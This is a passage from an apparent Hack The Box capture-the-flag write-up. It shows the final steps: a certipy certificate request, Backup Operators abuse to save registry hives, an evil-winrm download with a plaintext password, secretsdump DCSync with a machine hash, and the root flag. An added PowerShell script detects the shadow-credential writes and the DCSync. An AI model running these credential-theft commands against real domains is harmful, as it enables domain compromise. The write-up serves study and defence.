Request a certificate from the vulnerable template backupsvcauthentication:
certipy req -u 'svc_cabackup@mist.htb' -k -template backupsvcauthentication -ca mist-DC01-CA -key-size 4096 -dc-ip 192.168.100.100 -dns 192.168.100.100 -target dc01.mist.htb
Authenticate as svc_cabackup to inherit the new privileges:
certipy-ad auth -pfx cert.pfx -kirbi -domain mist.htb
impacket-ticketConverter svc_cabackup.kirbi svc_cabackup2.ccache

Abuse Backup Operators to back up the registry hives:
impacket-reg -k -no-pass mist.htb/svc_cabackup@dc01.mist.htb backup -o '\programdata'
Access the DC via WinRM to download the files:
evil-winrm -i dc01 -u op_Sharon.Mullard -p 'ImTiredOfThisJob:('
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> download SAM.save
Info: Downloading C:\programdata\SAM.save to SAM.save
Info: Download successful!
*Evil-WinRM* PS C:\programdata> download SECURITY.save
Info: Downloading C:\programdata\SECURITY.save to SECURITY.save
Info: Download successful!
*Evil-WinRM* PS C:\programdata> download SYSTEM.save
Info: Downloading C:\programdata\SYSTEM.save to SYSTEM.save
Info: Download successful!
Dump the hives' secrets and perform DCSync with the DC01$ account hash:
impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL

impacket-secretsdump mist.htb/'DC01$'@dc01 -hashes :e768c4cf883a87ba9e96278990292260 -just-dc-ntlm
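Both the shadow credential writes earlier in this path and the DCSync just above leave records on the DC: a 5136 directory-change event on msDS-KeyCredentialLink, and a 4662 object-access event whose Properties field names the replication control-access rights. The script below is an added detection example, not part of the original write-up or of Impacket; it needs the "Audit Directory Service Changes" and "Audit Directory Service Access" subcategories enabled with a SACL on the relevant objects, and the DC name, DC address and list of expected replicating accounts are assumptions taken from this write-up.

```powershell
# Added example, not part of the original write-up: query the Security events
# that the shadow-credential write and the DCSync above generate on a DC.
# Requires "Audit Directory Service Changes" (5136) and "Audit Directory
# Service Access" (4662) with a SACL on the objects, plus logon auditing (4624).
# The DC name, DC address and expected replicator list are assumptions.
param(
    [string]$DC = 'dc01.mist.htb',
    [int]$Hours = 24,
    [string[]]$ExpectedReplicators = @('DC01$'),     # accounts that legitimately replicate (DCs, AAD Connect, ...)
    [string[]]$DcAddresses = @('192.168.100.100')
)

# Control-access right GUIDs that a replication (DCSync) request exercises
$ReplGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'   # DS-Replication-Get-Changes-In-Filtered-Set
)

function ConvertFrom-EventData {
    # Flatten the <EventData><Data Name=...> pairs of a Security event into a hashtable
    param($Event)
    $d = @{}
    foreach ($n in ([xml]$Event.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    return $d
}

function Get-SecurityEvent {
    param([int]$Id)
    Get-WinEvent -ComputerName $DC -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName = 'Security'; Id = $Id; StartTime = (Get-Date).AddHours(-$Hours)
    }
}

function Get-KeyCredentialLinkWrite {
    # 5136: a directory object was modified. Only msDS-KeyCredentialLink changes
    # are kept; OperationType %%14674 is "Value Added", %%14675 "Value Deleted".
    foreach ($ev in Get-SecurityEvent -Id 5136) {
        $d = ConvertFrom-EventData $ev
        if ($d['AttributeLDAPDisplayName'] -ne 'msDS-KeyCredentialLink') { continue }
        [pscustomobject]@{
            Time      = $ev.TimeCreated
            Subject   = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            Object    = $d['ObjectDN']
            Operation = if ($d['OperationType'] -eq '%%14674') { 'Value Added' } else { 'Value Deleted' }
        }
    }
}

function Get-ReplicationAccess {
    # 4662: an operation was performed on an object. The Properties field lists
    # the GUIDs of the rights used; a replication right is the DCSync signature.
    foreach ($ev in Get-SecurityEvent -Id 4662) {
        $d = ConvertFrom-EventData $ev
        $used = @($ReplGuids | Where-Object { $d['Properties'] -match $_ })
        if ($used.Count -eq 0) { continue }
        [pscustomobject]@{
            Time     = $ev.TimeCreated
            Subject  = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            Rights   = ($used -join ',')
            Expected = ($ExpectedReplicators -contains $d['SubjectUserName'])
        }
    }
}

function Get-ReplicatorLogonFromForeignAddress {
    # 4624 for an expected replicator account from a source address that is not
    # a DC. This is how a DCSync run with a stolen DC01$ hash, as above, stands
    # out even though the Expected column would otherwise clear it.
    foreach ($ev in Get-SecurityEvent -Id 4624) {
        $d = ConvertFrom-EventData $ev
        if ($ExpectedReplicators -notcontains $d['TargetUserName']) { continue }
        if ($d['IpAddress'] -in @('-', '::1', '127.0.0.1') -or $DcAddresses -contains $d['IpAddress']) { continue }
        [pscustomobject]@{ Time = $ev.TimeCreated; Account = $d['TargetUserName']; Source = $d['IpAddress']; LogonType = $d['LogonType'] }
    }
}

Get-KeyCredentialLinkWrite             | Format-Table -AutoSize
Get-ReplicationAccess                  | Format-Table -AutoSize
Get-ReplicatorLogonFromForeignAddress  | Format-Table -AutoSize
```

On this box the first query would show the clear and set operations on CN=MS01 performed through the relayed MS01$ session, and later the svc_ca$ write to svc_cabackup; the second would list DC01$ using DS-Replication-Get-Changes-All, which looks legitimate by name alone, which is why the third query correlates that account's 4624 logons against the DC address list and surfaces the attacker's pivot address instead.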

Access the machine as Administrator

Root Flag: f5dcf7a3f2377ef6759aa413c768303f